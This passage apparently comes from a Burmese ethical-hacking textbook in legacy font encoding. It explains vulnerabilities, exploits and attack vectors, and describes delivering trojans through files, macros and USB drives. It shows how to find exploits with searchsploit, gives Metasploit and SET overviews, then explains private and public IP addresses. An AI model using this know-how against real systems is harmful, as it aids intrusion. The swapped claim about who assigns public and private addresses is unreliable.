Exploitation qdkwmudk raqG;aEG;rD Vulnerability qdkwmeJY ywfoufjyD;

tenf;i,f aqG;aEG;vdkygw,f/ Vulnerability qdkwm tm;enf;csuf vdkY jrefrmvdk
jyefqdkvdkY &ayr,fh b,fvdktm;enf;csufvJ? b,fvdkjzpfwmvJqdkwmudkawmh
odatmif azmfjyay;EdkifpGrf; r&Sdao;ygbl;/ National Institute of Science and
Technology (NIST) US &JY zGifhqdkcsuft& (Publication 800-3, Appendix B, Page
B-13 rSm) 'Dvdk azmfjyxm;ygw,f/
"Vulnerability qdkwm[m threat source awGuae exploit jyKvkyfEdkifwJh
information systems, system security procedures, internal controls
pwmawGxJrSm &SdaewJh (jzpfay:aewJh) tm;enf;csufrsm;" vdkY azmfjyxm;wmudk
awGY&ygr,f/ wu,fawmh tJonfxuf ydkus,fjyefYygao;w,f/ Vulnerability
onf error aMumifh jzpfay:ygw,f/ information system awGxJrSmjzpfap?
toHk;jyKol user &JU vGJrSm;rIwpfpHkwpf&muaewpfqifh jzpfap? administrator \
rSm;,Gif;aom vkyfaqmifcsuf wpfpHkwpf&maMumifhjzpfap aeYpOf toHk;jyKaeus
vkyfaqmifcsufawGudk vkyfaqmif&mrSm csdKU,Gif;rI? vGJrSm;rI yHkpHtaeeJY error awG
&SdaeEdkifygw,f/ 'gaMumifh error qdkwm system awG&JU ae&mpHkrSm yHkpHrsdK;pHkeJY
&SdaeEdkifwmyg/ Information system eJY ywfoufwJh Vulnerability awG[m
network &JU twGif;rSma&m jyifyrSmyg &SdaeEdkifygw,f/ exploit qdkwm xdkodkYaom
vulnerability awGudk &SmazG xdk;ESufwdkufcdkufjcif;yg/
OyrmwpfckeJY ajymjy&&if cyfao;ao; trIwpfck BuHKw,fqdkygpdkY/
w&m;olBuD;a&SUrSm &ifqdkif&awmhr,fh tajctaerSm w&m;cHu tm;em;csuf
(vulnerability) &Smygw,f/ tJ'Dtcg w&m;olBuD;u vmbfpm;wwfaMumif;
awGYw,f qdkygawmh/ 'g[m vulnerability yg/ tJonf vmbf,lw,fqdkwJh
vulnerability ay: tajcwnfjyD;awmh vmbfxdk;vdkufw,fqdkygawmh/ tJvdk
vmbfxdk;vdkufjcif;u exploit vdkufwmaygh/ &v'ftaeeJYawmh ol
umuG,fay;&r,fh tm;enf;ol (w&m;wJhol^ w&m;vdk) bufu &IH;edrfhoGm; wmaygh/
Oyrmajymwmaemf jrifa,mifrdatmifyJ ajymwmyg/ :)
txufygOyrmvdkygyJ/ system wpfckudk xGif;azmuf0ifa&muf
vdkyguvnf; xdk pepf&JU tm;enf;csufudk &SmazG&ygw,f/ vmbfxdk;&if
0ifcGifhay;rvm; ponfjzifhaygh/ 'DaeYacwfrSm jzpf&yfrSef Oyrmav;eJY xyfajym&&if
organization wpfckrSm tvkyfvkyfaewJhxJu network awGeJYywfoufjyD; wm0ef,l
&olwpfa,muf&Sdw,fqdkygawmh/ xdkwpfa,mufudk avhvmwJhtcg olYudk,fol
txifBuD;vGef; (bmrqdktukefod? bmrqdk olYoabmyJvdkY olY[mol cH,lxm;wwf)
wJhol jzpfaew,fqdkygawmh/ 'g[m Vulnerability ygyJ/ bmaMumifhvJqdk&if olYudk
ajrSmufay;jcif; odkYr[kwf rif;bmrSrodygbl;uGm qdkovdkrsdK; rcHcsifatmif
ajymay;jcif; pwmrsdK;av;awGeJYwif olYqDu tcsuftvufaygif;rsm;pGm xGufus
vmEdkifvdkYygyJ/
'gqdk vulnerability qdkwmonf system xJrSmwifr[kwfbJ system &JU
jyifyrSmyg &SdEdkifaMumif; jrifa,mifrdjyDxifygw,f/ exploitation qdkwmu tqkdyg
vulnerability ay: rlwnfjyD; wdkufcdkufjcif;yg/ tJovdk wdkufcdkufEdkifzdkYtwGuf
wdkufcdkuf&mrSm toHk;jyKEdkifwJh tool awG &Sdygw,f/ Hacker wpfa,muf&JU
taumif;qHk;aom penetrating tool uawmh olY&JU OD;aESmuf eJY todynmom
jzpfygw,f/ pepfwdkif; pepfwdkif;rSm xdkpepfqDodkY 0ifa&mufr,fh wHcg;aygufawG
(doors or entry points) rsm;pGm &SdaeMuygw,f/ wHcg;wpfcsyf ydwfxm;wmudk
awGY&if aemufwpfcg;wpfcsyfxH oGm;Munfhvdkufyg/
rSwf,lxm;&rSmu exploitation onf tcufcJqHk;aom tqifhawGxJu
wpfck jzpfjyD; penetration tester awG&JU tjyif;jyqHk;aomqE´eJY vkyfaqmif&wJh
talent wpfrsdK; jzpfw,fqdkwmygyJ/ tJonftwGuf tcsdefawG? todynmawG?
tawG;tac:aumif;awGudk toHk;jyK&ygr,f/ single attack vector wpfckay:
vkyfaqmifEdkifwJh attack types awG tm;vHk;udkvnf; rSwfrd od&SdaezdkY vdktyfjyD;
uRrf;usifydkifEdkifpGm toHk;jyKwwfzdkYvnf; vdktyfrSmjzpfygw,f/

Attack Vectors Vs Attack Types

'Dtydkif;rSmuawmh tawmfrsm;rsm; a&maxG;aewmav;awG &Sdygw,f/
tcsdKUu attack vector = attack type vkdY twlwlyJ,lqxm;Muovdk tcsdKUuawmh
rwlwmawmh odMuyg&JU/ attack type udk attack vector vdkY xifaewwfMuygw,f/
uJ olwdkY bmawGuGmjcm;rvJ Munfh&atmif/
Attack vector qdkwm tvG,fqHk;ajym&&if attack wpfckck
jzpfyGm;apEdkifr,fh vrf;aMumif; jzpfygw,f/ attack type qdkwmuawmh wdkufcdkufwJh
enf;vrf; method (technology) vdkY ajymvdkY&ygw,f/ ydkem;vnfatmif ajym&&if
Oyrm website wpfckudk SQL injection eJY wdkufcdkufw,f qdkygpdkY/ SQL qdkwm web
application wpfckudk browser uae wdkufcdkufwmyg/ 'DjzpfpOfrSmqdk web
application onf attack vector jzpfjyD;awmh SQL injection uawmh attack
methon yg/ SQL a&;vdkufwJh code awGuawmh exploit aygh/
em;rvnfao;&if aemufxyf Oyrm wpfck ay;ygr,f/ vltawmfrsm;rsm;
BuHKae& BuHKzl;ae&wJh Oyrmyg/ Attacker u virus code awG aygif;pyfxm;wJh pdf
zdkifwpfckudk zefwD;jyD; target xH mail ay;ydkYygw,f/ target uvnf; olzwfcsifaewJh
pmtkyfrdkY csufcsif; a'gif;jyD; zwfvdkufw,f/ tJonftcgrSm twlygvmwJh virus
code awGuaewpfqifh pdf zwfvdkufol&JU pufxJudk virus awG a&muf&SdoGm;w,f/
qdkygpdkY/
'DjzpfpOfudk jyefMunfh&if attack vector (attack surface) onf mail eJY
user's system jzpfygw,f/ 'gawGr&Sd&if 'D attack rjzpfyGm;ygbl;/ attack type
uawmh malicious code injection jzpfjyD;awmh pdf xJrSm ygoGm;wJh virus code
awGuawmh exploit awG jzpfygw,f/ b,f vulnerability ay: tajccHvJqdkawmh
pdf viewer u code execution udk vufcHwJh tm;enf;csuf? user u rppfaq;bJ
zGifhrdwJh tm;enf;csuf? PDF viever rSm java script awGudk run cGifh ydwfrxm;wJh
tm;enf;csuf pwJh tm;enf;csuawGudk awGY&ygr,f/ 'gawGu Vulnerabilities yg/
'Davmufqdk twefi,fawmh oabmaygufjyD xifygw,f/ ydkjyD; &Sif;&Sif;jrif&atmif
atmufyg Z,m;av;udk Munfh&atmifyg/
Attack Vectors Attack Types
Code Injection Buffer Overflow
Buffer Underrun
Viruses
Maleware
Web Based Defacement
Cross-Site Scripting (XSS)
Cross-Site Request Forgery (CSRF)
SQL Injection
Network Based Denial of Service (DoS)
Distributive Denial of Service (DDoS)
Password and Sensitive Data Interception
Stealing or Counterfeiting Credentials
Social Engineering Impersonation
Phishing
Spear Phishing
Intelligence Gathering

txufyg Z,m;uGufrSmawmh erlemtaeeJY Attack Vectors & Attack

Types awGudk cGJjyxm;ygw,f/ (ref: Hacking With Kali <PPTT>)
Local Exploits
'Dcgawmhexploit awGtaMumif; enf;enf; jyefvSnfh&atmifyg/
Local exploit qdkwJhtwdkif;yJ olYudk local network twGif;rSmom exploit
jyKvkyfygw,f/ organization wpfckrSm network csdwfquf vkyfaqmifaewJh device
q,fvHk; &Sdw,f qdkMuygpdkY/ tJonf q,fvHk;xJu wpfvHk;vHk;uae jyKvkyfapwmrsdK;
odkYr[kwf attacker udk,fwdkifu tqdkyg network uGef,ufxJodkY 0ifa&muf
csdwfqufjyD; exploit awGudk jyKvkyfwmrsdK; 'grSr[kwf attacker u zefwD;xm;wJh
auto executable USB udk tqdkyg network twGif;&Sd Device wpfckckrSm wyfqif
vdkufjcif;rsdK; pwJh enf;vrf;rsdK;awGeJY vkyfaqmifavh&SdMuygw,f/
'Dvdk vkyfaqmif&wJh &nf&G,fcsufawGuawmh Network xJrSm vkyfaqmif
EdkifcGifhtwdkif;twm (system privileges) awG wdk;jrSifhEdkifzdkY? DoS vkyfaqmifEdkifzdkY
(odkYr[kwf) DDoS rSm yg0ifvkyfaqmifapcsifvdkY? information awGudk cdk;,lcsifvdkY eJY
malicious file awGudk upload jyKvkyfvdkwJh pwJh &nf&G,fcsufawGeJY
vkyfaqmifMuavh &Sdygw,f/ Local exploit vdkY qdkwJhtwGuf tjcm; network (or)
internet uae vkyfaqmifvdkY r&ygbl;/ rdrdwdkY target &JU network xJrSm
vkyfaqmif&rSm jzpfygw,f/
tJonftwGufawmh target organization xJu legal user awGudkyJ
toHk;csMu&ygw,f/ Oyrmajym&&if Trojan (or) Backdoor zdkifawGudk movie (or)
pdf awGxJrSm aygif;pyfjyD;jzpfap? macro code awGudk Microsoft Office (word,
excel) zdkifawGrSm aygif;pyfxnfhoGif;jyD;jzpfap Social Engineering udk
vdr®myg;eyfpGm toHk;jyKjyD; target network xJu vkyfydkifcGifh&SdolxH
ay;ydkYavh&SdMuygw,f/ xdkolu xdkzdkifawGudk zGifhvdkufjcif;tm;jzifh attacker udk
ulnDay;ygawmhw,f/ 'gaMumifh rdrdwdkY&JU vkyfief;awGxJrSm uGefysLwmeJY xdawGY
ywfouf vkyfaqmifae&wJh 0efxrf;awG&JU Security Knowledge u
ta&;ygwJhae&mrSm&Sdwm odEdkifygw,f/

Local Exploit Searching

txufrSm aqG;aEG;cJhwJh Local Exploit awG[m rsm;pGm &SdaewmrdkY
rSefuefwJh exploit udk a&G;cs,ftoHk;jyKwwfzdkYqdkwm pwifavhvmp olawGtwGuf
tpydkif;rSm cufcJEdkifygw,f/ Rapid7 &JU Metasploit rSmawmh xdkodkY exploit
awGtrsm;BuD;xJuae &SmazGEdkifzdkYtwGuf program wpfckudk jyKvkyfxm;ay;ygw,f/
SearchSploit vdkYac:wJh xdk &SmazGay;wJh program eJY Metasploit onf uRefawmfwdkY
toHk;jyKMur,fh Kali Linux rSm yg0ifjyD;om;jzpfwmrdkY oD;jcm; install aep&m
rvdkyg/ vufawGY prf;oyfoHk;Munfh&atmif/ Terminal rSm searchsploit local vdkY
&dkuf&SmMunfhyg/
 txufygyHktwdkif; Local Exploit awGudk thousands jrifawGY&ygr,f/
t&rf;udk rsm;vGef;ygw,f/ tJxJurS enf;enf; csHKUjyD; jyef&SmMunfh&atmif/

txufygtwdkif; windows twGuf &SmMunfhwmawmif exploit aygif;

axmifeJYcsD jrifawGY&rSmjzpfygw,f/

&SmazGrI result udk ydkjyD;usOf;ajrmif;oGm;apzdkYtwGuf aemufrSm excel

qdkwmav; &dkufxnfh&SmMunfh&atmif/ txufyg yHku command twdkif;
jzpfygw,f/

txufygyHkrSm Munfhr,fqdk&if Microsoft Excel uaewpfqifh

wdkufcdkufEdkifr,fh exploit awGudk awGYjrif&rSmyg/ yHkrSm exploit aygif; 17 ck
awGY&ygw,f/ 'gavmufqdk searchsploit command eJY &SmazGvdkY &wmawGudk
odavmufjyDvdkY ,lqygw,f/

exploit wpfckpDudk zGifhMunfhcsif&ifawmh cat, gedit, leafpad tqifajy&m

wpfckckudk oHk;jyD; Path ESpfydkif; aygif;jyD; xnfhzGifhMunfhEdkifygw,f/ Oyrm -
 txufygyHk&Sd exploit udk Munfhvdkygu main Path onf
/usr/share/exploitdb/platforms/ qdkjyD; awGY&ygr,f/ qdkvdkwmuawmh atmufrSm
ay:vmr,fh exploit wdkif;[m tJonfxJrSm &Sdr,fvdkY qdkvdkwmyg/ zGifhMunfhr,fh
exploit u txufygyHku windows/local/14966.py udk qdkygpdkY/ main file path eJY
aygif;vdkufwJhtcg /usr/share/exploitdb/platforms/windows/local/14966.py qdkjyD;
&ygr,f/ tJonfa&SUrSm cat (or) gedit (or) leafpad wpfckck xnfh&dkufvdkuf&HkygyJ/

Remote Exploit
Computer, network device, mobile phone or service pwmawGudk
network/ Operating System &JU jyifyuae jyKvkyfEdkifaom exploit rsdK;udk remote
exploit vdkY ac:qdkygw,f/ tcsdKUu network exploit vdkYvnf; ac:Muygao;w,f/
b,fvdkac:ac:yg/ ta&;BuD;wmu local exploit r[kwf&if remote exploit
jzpfw,fqdkwmygyJ/ remote exploit [m computers, servers eJY network
equipment awGudkomru web services & applications, databases, printers,
mobile phones pwJh network eJY csdwfquf vkyfaqmifxm;wJh t&m&mwdkif;xd
exploit vkyfavh&Sdygw,f/ remote exploit awGudk &SmazGMunfhvdkygu
atmufygtwdkif; &SmMunfhEdkifygao;w,f/

Metasploit
Metasploit qdkwmudkawmh hacking avhvmr,fholawGtwGuf rpdrf;wJh
pum;vHk;wpfvHk; jzpfygw,f/ metasploit [m pen-tester awG&JU powerful tool
tjzpf wnf&Sdaeygw,f/ Metasploit twGuf tus,fazmfjy&if pmtkyf
wpftkyfpmxuf rsm;pGm ausmfvGefoGm;Edkifygw,f/ 'gaMumifh vdk&if;av;awGyJ
ajymyg&ap/
Metasploit pro eJY Metasploit free qdkjyD; Version ESpfrsdK; vmovdk
security team awGeJY Government agency awGuawmh reporting, group
collaboration, compliancy checking, advanced wizards for precision & control
awG yg0ifwJh pro version udk 0,f,ltoHk;jyKavh&SdMuygw,f/ Exploit Module
awGu twlwlyJjzpfwmaMumifh omref toHk;jyKr,fh uRefawmfwdkYtwGufawmh
0,foHk;p&m rvdkygbl;/ :)
 olY&JU framework av;udk Munfh&atmif/ olYrSm t"dutm;jzifh modules
type 5ck yg0ifygw,f/
1. Exploit Modules
2. Auxiliary Modules
3. Payloads
4. Listeners
5. Shell code
qdkjyD; jzpfygw,f/ Armitage vdk category awGudkyg xnfhoGif;jyD; 6th
Categories vdkYvnf; ajymMuygao;w,f/ aemuf Metasploit Chapter a&mufrS
qufvuf aqG;aEG;oGm;ygr,f/ ckuawmh Overview taeeJYom aqG;aEG;cJhjcif;yg/

Social Engineering Toolkit

Penetration toolkit awGudk aqG;aEG;wJhtcg Phishing jyKvkyf&mrSm
emrnfBuD;wJh setoolkit (social engineering toolkit) udk tawmfrsm;rsm; od&SdMujyD;
jzpfygw,f/ toHk;jyK&wm vG,ful&dk;&Sif;wJhtwGufa&m Local twGif;
pGrf;aqmif&nf aumif;rGefwmawGaMumifha&m emrnf&wJh tool wpfckyg/
CHAPTER wpfckeJY oD;oefY aqG;aEG;ay;rSmrdkY 'Dae&mrSmawmh rdwfquf&Hkav;yJ
xkwfjyyg&apOD;/

'Dae&mtxd uRefawmfaqG;aEG;azmfjycJhwmav;awGuawmh Chapter 9:

Exploitation twGuf toHk;jyKwJh toolkit awGtaMumif;yJ &Sdygao;w,f/ Exploit
jyKvkyfwJh Techniques awGvnf; &Sdygao;w,f/ a&SUrSm uRefawmfwdkY
aqG;aEG;cJhMuwJh Phases of Ethical hacking rSm jyKvkyf&r,fh tqifhawGudk
tenf;qHk; av;qifhtjzpf aqG;aEG;cJhMuwJhteuf Exploitation Phase u
aqG;aEG;p&m trsm;qHk;eJY tus,fjyefYqHk;jzpfygw,f/ 'D CHAPTER rSmawmh
'Dae&mrSmyJ &yfem;vdkufygw,fcifAsm/

aemufydkif;awGrSm wpfcef;csif;pD aqG;aEG;rS ydk oifhawmfr,fxifvdkYyg/

CHAPTER 11: Additional Knowledge Foundation

What is IP Address?

'Dae&mrSm 'DtaMumif;t&mav;awGudk jznfhpGufazmfjyzdkY rlvu

pdwful;r&SdcJhaMumif; 'DtaMumif;t&mudk raqG;aEG;rD 0efcHyg&ap/ wu,fqdk
'DtaMumif;awGudk a&SUrSm a&;&rSmjzpfayr,fh rlvu pmrsufESmavQmhwJhtaeeJY
xnfhra&;zdkY pOf;pm;xm;rdcJhwmyg/ tm;vHk; odMujyD; taMumif;t&mjzpfvdkY
ra&;cJhayr,fh 'Dpmudk ra&;ciftcsdefrSmyJ uRefawmfheJY odwJhol tcsdKUu
ar;cGef;av;awG ar;vmygw,f/
IP address u wpfckwnf;r[kwfbl;vm;vdkY ar;wJhol&,f? IP address
awGu Dynamic awG Static awG Public awG Private awGeJY &IyfaewmyJqdkwJholeJY
yg/ olu Dynamic & Static, Public & Private tJ'gawGudk wlwlyJudk
bmompum; ESpfrsdK;uGJovdk cGJac:wmvm; vdkY ar;vmawmh 'Dpmtkyfzwfr,fholawG
xJrSma&m 'Dvdk odcsifwJhol &Sdrvm;qdkwJhtawG;eJY 'Dtydkif;awGudk jznfhpGufvdkuf&
ygw,fcifAs/
tm;vHk;odxm;wJhtwdkif;ygyJ/ IP Address (Internet Protocol Address)
qdkwm tvG,fqHk;ajym&&if uRefawmfwdkY&JU tifwmeufay:u vdyfpm jzpfygw,f/
IP address qdkwmudk tm;vHk; odMuayr,fh IP address ESpfrsdK;&SdrSef; rodolawG?
Dynamic, static, public & private rSm bmawGuGmvJqdkwm rodwJholawG &Sdaewm
rdkYvdkY tJonfuaeyJ p ajymyg&ap/

What is Private IP address?

'Dar;cGef;udkawmh awmfawmfrsm;rsm; ajzEdkifvdrfhr,fxifygw,f/
uRefawmfwdkY toHk;jyKaewJh uGefysLwmawGrSm &SdaewJh IP address udk ajymwm vdkY
tMurf;zsif; ajzMuwmudkawGY&ygw,f/ uRefawmfwdkY router wpfckck oHk;jyD;
tifwmeuf csdwfqufw,f qdkygpdkY/ xdk router rSm local address awGu default
taeeJY yg0ifjyD;jzpfjyD; router trsdK;tpm;(xkwfvkyfonfh ukrÜPDtvdkuf) pD;&D;awG
wlavh&Sdygw,f/
 Linksys routers use 192.168.1.1
 D-Link and NETGEAR routers are set to 192.168.0.1
 Cisco routers use either 192.168.10.2, 192.168.1.254 or
192.168.1.1
 Belkin and SMC routers often use 192.168.2.1
 txufyg address awGu Oyrm azmfjyjcif;om jzpfjyD; xdkeHygwfawG&JU
pD;&D;tvdkuf Local Machine awGrSm xkwfay;avh&Sdygw,f/ Oyrm qdkMuygpdkY/
uRefawmfwdkYu pmwpfapmif ydkYr,fqdkygpdkY/ uRefawmfwdkY vdyfpmrSm trSwf 123?
3vTm? ESif;qDvrf;? tif;pdefjrdKUe,f? &efukefjrdKU qdkjyD; uRefawmfwdkYqDudk
pmjyefxnfh&r,fh vdyfpmae&mrSm a&;jyD; ydkYvdkufw,fqdkygpdkY/ uRefawmfwdkY ydkYvdkufwJh
pmu (Oyrm tjcm;jrdKU^EdkifiH)udk a&mufoGm;wJhtcg olwdkYu jyefydkYr,fqdkygpdkY/
uRefawmfwdkY xnfhay;vdkufwJhvdyfpmtwdkif; jyefydkYrSmayr,fh olwdkYtaeeJY twdtus
odrSmr[kwfygbl;/
Oyrm uRefawmfwdkYu US u todwpfa,muf&JU vdyfpmqD pmay;ydkYr,f
qdkygpdkY/ olYqDu pmjyefwJhtcg uRefawmfwdkYay;vdkufwJh vdyfpmtwdkif;om
jyefydkYrSmayr,fh olYtaeeJY odrSmu Yangon, Myanmar qdkwmygyJ/ 'gudkyJ ol
odygvdrfhr,f/ usefwJh vrf;awG tdrftrSwfawG pwmawGudk olodrSm r[kwfygbl;/
tJ'Djzpf&yfuav;udk jyefMunfh&if uRefawmfwdkY&JU vdyfpmrSm tydkif; 2ydkif;
uGJaewmudk awGYEdkifygw,f/ wpfbufupmonf uRefawmfwdkYqDudk
jyefa&mufzdkYtwGuf &efukefeJY oufqdkifwJh pmwdkufqD t&if a&mufygr,f/ jyD;rS
uRefawmfwdkYqD aemufwpfqifh xyfa&mufrSmjzpfygw,f/
tJonfawmh aemufwpfqifhtaeeJY xyfa&mufvmr,fh uRefawmfwdkY&JU
vdyfpmu wpfydkif; trsm;odwJh vdyfpmu wpfydkif; tJvdkuGJygw,f/ ydkjyD;&Sif;atmif
ajymjy&&if &efukefrSmaewJh armifarmifu awmifBuD;rSmaewJh atmifatmifhxH
pmydkYw,f qdkygpdkY/ atmifatmifay;wJh vdyfpmu trSwf 24? taemf&xmvrf;ESifh
cGmndKvrf;axmifh? awmifBuD;? &Srf;jynfe,f qdkygpdkY/ &efukefom; armifarmif
odwmu olpmydkYr,fhol atmifatmifu awmifBuD;u jzpfw,f qdkwmygyJ/
tJovdkyJ armifarmif pmxnfhay;r,fh &efukefpmwdkufuvnf;yJ 'Dpm awmifBuD;udk
ydkY&r,fqdkwmyJ odygvdrfhr,f/ bmvrf;awG b,fae&mqdkwmudk odrSmr[kwfygbl;/
'Dawmh 'Dpmav;u awmifBuD;pmwdkufudk a&mufoGm;ygvdrfhr,f/
awmifBuD;pmwdkufuaerS wpfqifh trSwf24? taemf&xmvrf;ESifh
cGmndKvrf;axmifh udk a&mufoGm;rSmjzpfygw,f/ 'DjzpfpOfuav;rSm jyefMunhf&if
&efukefpmwdkufeJY awmifBuD;pmwdkufMum; vrf;aMumif;vdyfpm wpfck?
awmifBuD;pmwdkufeJY vufcHr,fholMum; vrf;aMumif;wpfckudk cGJjrif&rSmjzpfygw,f/
uRefawmfwdkY&JU router u awmifBuD;pmwdkufuJhodkY vkyfaqmifygw,f/
olYqDa&mufvmwJh pmawGxJuae ydkYay;&r,fhol&JU vdyfpmxH twdtus
jyefydkYay;&wJh wm0efudk ,lygw,f/ tJonfawmh oljyefydkYay;&wJh vdyfpmu olY&JU
jrdKUe,fwGif;rSm&SdwJh vdyfpm jzpfygw,f/ 'g[m Local address u&JU oabm
jzpfjyD;awmh private IP address eJY obm0csif; wlnDrI&Sdygw,f/
Private IP address qdkwm[m router uae owfrSwfxm;ay;wJh
vdyfpmjzpfjyD; Local Address jzpfygw,f/ router &JU wm0efu jyifyu
0ifa&mufvmr,fh tcsuftvufawGudk oufqdkif&m vdyfpmawGtvdkuf
jyefvnfay;ydkY&wJhtvkyfudkvnf; vkyfaqmifygw,f/ tJvdk ay;ydkY&mrSm Private IP
address udk toHk;jyKygw,f/ 'gaMumifh IP address awG[m wpfckeJYwpfck wlnDvdkY
r&wm jzpfygw,f/ t"du vdk&if;tcsufuawmh private IP address (or) Local
address onf uRefawmfwdkY csdwfqufxm;wJh uGef,ufwpfckwnf;&JU atmufrSm
&SdaewJh device awG&JU vdyfpmudk qdkvdkygw,f/ 'gav;ajymzdkYudk
pum;aMum&Snfaew,fvdkY rxifygeJYAsm/ tcsdKUu wu,fhudk rodvdkYyg/
Private IP address udk odvdkygu Linux Terminal rSm ifconfig vdkY
&dkufxnfhjyD; Munfh&IEdkifygw,f/ a&SUrSm azmfjycJhjyD;jyDaemf/ Windows rSmqdk&ifawmh
cmd rSm ipconfig vdkY &dkuf&SmEdkifygw,f/

What is Public IP address?

cke aqG;aEG;cJhwJh Oyrmt& Public IP address udk &dyfrdr,f xifygw,f/
uRefawmfwdkYonf tjcm;EdkifiHwpfckudk a&mufoGm;wJhtcgrSm xdkEdkifiHuvlawGtaeeJY
uRefawmfwdkYudk odrSmonf jrefrmEdkifiHu qdkwmyJ jzpfygw,f/ b,fjrdKUe,f
b,fvrf;qdkwmawGudk olwdkYtaeeJY odrSmvnf;r[kwfyg/ olwdkYodwJh jrefrmEdkifiHu
qdkwmonf Public IP address eJY oabmobm0csif;wlnDygw,f/ Website
wpfckudk uRefawmfwdkY oGm;a&muf avhvmwJhtcg tqdkyg website onf
uRefawmfwdkY&JU private IP address udk rod&Sdygbl;/ olYtaeeJY odEdkifwmu public
IP address yg/
ydk&Sif;atmif IP address ESpfrsdK;udk yHkpHcGJMunfh&atmif/
Private IP Address Public IP Address
Internal IP Address External IP Address
Only you can see The world can see
LAN IP Address WAN IP Address
(Local Area Network) (Wide Area Network)
'Davmufqdk em;rvnf&ifawmh oabmaygufvkawmh
&SdjyDvdkY ,lqygw,f/ uRefawmfwdkYu uRefawmfwdkY csdwfqufxm;wJh tifwmeuf
(wifi, cables, ...) uae facebook.com udk qufoG,fr,f qdkygawmh/ uRefawmfwdkY
network xJu b,fuGefysLwmuawmh facebook udk qufoG,faew,f qdkwmudk
odEdkifzdkYtwGuf internal address eJY rSwfom;&ygw,f/ jyD;wJhtcg external (public)
address udk toHk;jyKjyD; router uaewpfqifh facebook.com eJY xyfrH
csdwfqufay;ygw,f/ facebook.com u uRefawmfwdkY&JU public address twdkif;
jyefydkYvmygw,f/ awmifBuD;pmwkdufudk pm wpfqifha&mufovdkaygh/ tJonfrSm
router (awmifBuD;pmwdkuf)u olrSwfxm;wJh IP address twdkif; twdtus
jyefvnf ay;ydkYygw,f/ 'gaMumifh uRefawmfwdkY&JU Network xJrSm devices awG
rsm;pGm &SdwJhteuf uRefawmfwdkYxH wef;wef;rwfrwf a&mufvmEdkifwm jzpfygw,f/
(awmifBuD;rSm tdrfawG trsm;BuD;&Sdayr,fh vufcHr,fhtdrfwpftdrfwnf;udkom
rSefuefpGm ydkYay;EdkifwmrsdK;yg)
aumif;jyD/ 'gqdk uRefawmfwdkY&JU Public IP Address udk b,fvdk
MunfhEdkifrvJ/ vG,fygw,f/ uRefawmfwdkY oHk;aeus Browser (zkef;rSmjzpfjzpf?
uGefysLwmrSmjzpfjzpf &ygw,f) &JU address bar rSm what is my ip address .com vdkY
wGJjyD; &dkufxnfhay;&HkygyJ/ cGJa&;jywmu rSwfrdatmifyg/ &dkufxnfh&rSmu
whatismyipaddress.com jzpfygw,f/ enter vdkufr,fqdk&if bmawGY&rvJ/
prf;Munfhyg/

'guawmh uRefawmf erlemtaeeJY Munfhjywmyg/ rdrdwdkY&JU browser

awGrSmvnf; jyefMunfhMunfhyg/ ifconfig eJY MunfhwJhtcg jrif&wJh ip address eJY vHk;0
wlnDjcif;r&Sdwmudk awGY&ygr,f/ Public IP Address u router u owfrSwfay;wm
jzpfjyD; Private IP Address uawmh uRefawmfwdkY&JU Internet Service Provider (ISP)
u owfrSwfay;xm;wmrdkYvdkYygyJ/
uRefawmfwdkY tifwmeuf oHk;wJhtcgrSm tqdkyg Address ESpfrsdK;u
yl;wGJwm0efxrf;aqmifygw,f/ aemufxyf rSwfxm;oifhwmav;wpfck
&Sdygao;w,f/ bmvJqdk&ifawmh Public IP Address u uRefawmfwdkY&JU
wnfae&mudk teD;pyfqHk; azmfjyay;EdkifwmygyJ/
 whatismyipaddress.com rSm uRefawmfwdkY&JU IP Address udk
jyxm;&Hkwifr[kwfao;ygbl;/ atmufbufem;u ajryHk (google map) rSm
uRefawmfwdkY wnf&SdaewJh teD;pyfqHk;ae&mudkyg azmfjyxm;wmudk awGY&rSmyg/
wpfpHkwpfa,muf&JU IP address uae wnfae&mudk odcsif&ifvnf;
pHkprf;MunfhEdkifygao;w,f/ Oyrm uRefawmfh todwpfa,muf&JU IP address udk IP
Lookup vkyfjyygr,f/ wdkuf&dkuf &SmazGEdkifzdkYtwGufawmh
whatismyipaddress.com/ip/ qdkwJhaemufrSm rdrdwdkY odvdk&m IP address udk
xnfh&Sm&HkygyJ/ uRefawmf &SmMunfhr,fh public IP address u 103.52.14.0 jzpfwmrdkY
whatismyipaddress.com/ip/103.52.14.0 vdkY&dkufxnfhjyD; enter vdkufwJhtcg
atmufygtwdkif; jrif&ygr,f/

tm;vHk;jrifomatmif jyxm;wmrdkY yHku r&Sif;yg/ rdrdwdkY&JU Public IP

Address udk erlemtaeeJY xnfh&SmMunfhEdkifygw,f/ IP Lookup uae Munfh&if
jrif&wmawGudk jyefjyay;ygr,f/
 txufyg lookup rSm Munfh&if IP address wpfckuae azmfjyay;EdkifwJh
tcsuftvufawGudk awGYjrifEdkifrSmjzpfygw,f/ yHkt&qdk user onf MPT eJY
tifwmeuf oHk;aew,fqdkwm? jrefrmEdkifiH u,m;jynfe,f vGdKifaumfjrdKU u qdkwm?
vwåDusKb,favmuf avmif*sDusKb,favmufrSm qdkwm jrifEdkifrSmjzpfjyD; vufawGY
&SmMunfhwJhtcg ajryHkrSm teD;pyfqHk; jyxm;wmudk awGY&rSmjzpfygw,f/
txufyg IP tracking rsdK;udk Online Store awGjzpfwJh amazon.com
wdkYvdk website awG? Facebook eJY google wdkYvdk Location eJY uefYowfcsufxm;wJh
site rsdK;awGrSm toHk;jyKavh&Sdygw,f/ 'DESpfydkif;udk tcsKyftm;jzifh jyefajym&&if
Private IP address qdkwm uRefawmfwdkY&JU Network wpfckwnf;rSm&SdaewJh
pufwpfvHk;csif;pDtvdkuf rwlnDwJh internal (local) address jzpfjyD; network
wpfckwnf;atmufrSm csdwfqufxm;wJh device awGtcsif;csif;om toHk;jyKEdkif r,fh
vdyfpm jzpfygw,f/ Public IP address uawmh uRefawmfwdkY&JU external address
(wpfenf;tm;jzifh jyifyeJYqufqHwJh vdyfpm) om jzpfygw,f/
 txufyg yHkudkavhvm&if uRefawmfwdkYawG&JU tifwmeuf toHk;jyKaeyHkudk
jrifomygvdrfhr,f/ uRefawmfwdkYawG tifwmeuf &,loHk;Edkifwm router awGaMumifh
t"du r[kwfygbl;/ t"duuawmh Internet Service Provider (ISP) aMumifh
jzpfygw,f/ router uawmh ISP u tifwmeufvdkif;udk uRefawmfwdkY&JU device
awGrSm jyefoHk;Edkifatmif ulnDay;ygw,f/ yHkt& router &JU IP address u
192.168.0.1 jzpfjyD; internal address tjzpf csxm;ay;wJh Private IP Address
awGrSmvnf; 192.168.0. eJY tpjyKxm;wmudk awGYjrifEdkifygw,f/
'Dae&mrSm ISP uae wpfqifh uRefawmfwdkYudk jyefay;xm;wJh Public IP
